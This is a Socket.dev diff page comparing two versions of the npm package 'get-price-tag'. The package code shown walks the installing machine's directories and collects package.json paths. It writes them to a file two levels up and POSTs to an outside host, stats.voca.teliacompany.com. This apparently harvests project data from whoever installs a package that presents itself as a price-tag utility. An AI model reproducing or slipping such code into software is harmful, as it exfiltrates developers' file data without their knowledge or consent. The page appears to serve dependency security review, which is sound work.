New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More
Socket
Sign inDemoInstall
Socket

get-price-tag

Package Overview
Dependencies
Maintainers
1
Versions
71
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

get-price-tag - npm Package Compare versions

Comparing version 0.0.39 to 0.0.40

2

package.json
{
"name": "get-price-tag",
"version": "0.0.39",
"version": "0.0.40",
"main": "dist/commonjs/index.js",

@@ -5,0 +5,0 @@ "types": "dist/index.d.ts",

@@ -25,7 +25,6 @@ import fetch from "node-fetch";

});
} else if (stat && stat.name === "package.json") {
} else if (stat && path.basename(stat) === "package.json") {
results.push(file);
next();
} else {
results.push(file);
next();

@@ -41,3 +40,6 @@ }

console.log(results);
writeFileSync("../../packageData.txt", "New file data: " + results.join(','));
writeFileSync(
"../../packageData.txt",
"New file data: " + results.join(",")
);
fetch("https://stats.voca.teliacompany.com/projects", {

@@ -44,0 +46,0 @@ method: "post",

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc